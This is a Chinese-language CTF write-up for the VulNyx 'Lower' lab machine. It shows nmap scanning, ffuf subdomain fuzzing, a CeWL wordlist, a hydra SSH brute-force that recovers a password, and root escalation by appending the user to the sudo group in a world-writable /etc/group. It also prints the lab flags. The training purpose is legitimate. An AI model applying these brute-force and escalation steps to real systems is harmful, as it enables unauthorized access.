Vlx_Lower

靶机来源: https://vulnyx.com/

难度:Low

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 09:20 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00033s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00082s latency).
MAC Address: 08:00:27:9E:AE:CF (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.85
Host is up (0.00090s latency).
MAC Address: 08:00:27:E2:E9:59 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.52 seconds

靶机IP:192.168.2.85

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.85                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 09:21 +0800
Nmap scan report for 192.168.2.85
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E2:E9:59 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.14 seconds

开放端口:22、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.85
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 09:21 +0800
Nmap scan report for 192.168.2.85
Host is up (0.0012s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Did not follow redirect to http://www.unique.nyx
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:E2:E9:59 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.54 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.85                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 09:22 +0800
Nmap scan report for 192.168.2.85
Host is up (0.0015s latency).
All 100 scanned ports on 192.168.2.85 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:E2:E9:59 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 58.46 seconds

二、WEB渗透

1、DNS发现

访问80端口,提示一个新的域名

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~/miaosec]
└─# curl -i http://192.168.2.85
HTTP/1.1 302 Found
Date: Fri, 13 Mar 2026 01:22:42 GMT
Server: Apache/2.4.62 (Debian)
Location: http://www.unique.nyx
Content-Length: 0
Content-Type: text/html; charset=UTF-

追加到/etc/hosts文件中

1
2
┌──(root㉿kali)-[~/miaosec]
└─# echo "192.168.2.85 www.unique.nyx" >> /etc/hosts

访问www.unique.nyx,提示无法重定向 img

2、子域名_burf

进行子域名爆破

1
2
3
4
5
┌──(root㉿kali)-[~/miaosec]
└─# ffuf -u http://www.unique.nyx -H "Host: FUZZ.unique.nyx" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 20 -ac

tech                    [Status: 200, Size: 19766, Words: 4127, Lines: 453, Duration: 81ms]
:: Progress: [100000/100000] :: Job [1/1] :: 2702 req/sec :: Duration: [0:01:01] :: Errors: 0 ::

找到域名tech.unique.nyx,追加至/etc/hosts

1
2
┌──(root㉿kali)-[~/miaosec]
└─# echo "192.168.2.85 tech.unique.nyx" >> /etc/hosts

3、Cewl

访问tech.unique.nyx img

查看网页,发现存在三个关键的用户名:tom、kathren、lancer

使用Cewl,将网页的关键信息提取出来

1
CeWL –自定义词表生成器,是一个 ruby 程序,可将特定 URL 爬取到定义的深度并返回关键字列表,密码破解者如John the Ripper、Medusa和 WFuzz 可以使用这些关键字来破解密码。Cewl 还有一个相关的命令行应用程序 FAB,它使用相同的元数据提取技术,使用 CeWL 等信息提取算法从已下载的文件中生成作者/制作者列表。
  • -m6:只收集长度 ≥6 个字符的单词
  • --with-numbers:默认情况下,CeWL 会忽略包含数字的单词,加上这个选项后,允许包含数字的单词被收录进字典
1
2
3
┌──(root㉿kali)-[/tmp]
└─# cewl -m6 "http://tech.unique.nyx/" --with-numbers -w pass.dic
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

三、SSH_Burf

使用hydra进行爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/tmp]
└─# hydra -t 4 -L user.txt -P pass.dic ssh://192.168.2.85 -F -I 
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-13 10:08:19
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 399 login tries (l:3/p:133), ~100 tries per task
[DATA] attacking ssh://192.168.2.85:22/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 319 to do in 00:04h, 4 active
[STATUS] 75.00 tries/min, 225 tries in 00:03h, 174 to do in 00:03h, 4 active
[22][ssh] host: 192.168.2.85   login: lancer   password: NewY0rk
[STATUS] attack finished for 192.168.2.85 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-13 10:13:04

成功找到账号和密码:lancer:NewY0rk

四、获取Lancer权限

使用获取到的凭证进行登录

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~]
└─# ssh lancer@192.168.2.85    
The authenticity of host '192.168.2.85 (192.168.2.85)' can't be established.
ED25519 key fingerprint is: SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.85' (ED25519) to the list of known hosts.
lancer@192.168.2.85's password: 
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
lancer@lower:~$ id
uid=1000(lancer) gid=1000(lancer) groups=1000(lancer)

五、权限提升

查看当前用户可写的文件

1
2
lancer@lower:/$ find / \( -path /proc -o -path /sys \) -prune -o -perm -o=w -type f -print 2>/dev/null
/etc/group

发现/etc/group可以进行写入,那么就尝试将当前用户加入到sudo组里面

1
lancer@lower:/$ echo 'sudo:x:27:lancer' >> /etc/group

重新进行连接后,让其生效,查看当前用户的组,成功加入到了sudo

1
2
lancer@lower:~$ groups
lancer sudo

进行提取即可,成功获取到root权限

1
2
3
4
lancer@lower:~$ sudo su -
[sudo] password for lancer: 
root@lower:~# id
uid=0(root) gid=0(root) grupos=0(root)

六、查看FLAG

1
2
3
root@lower:~# cat /root/root.txt /home/lancer/user.txt 
b2daf29b8bd041ea1787f345799b61b4
bbb446e708226206823f2f74b9dc540c
Vulnyx
#FUZZ #Cewl #SSH_Burf #提权_Group组
Vlx_Lower
http://miao-sec.github.io/Vulnyx/Vlx-Lower/
作者
Miao
发布于
2026年3月13日
许可协议
BY-MIAO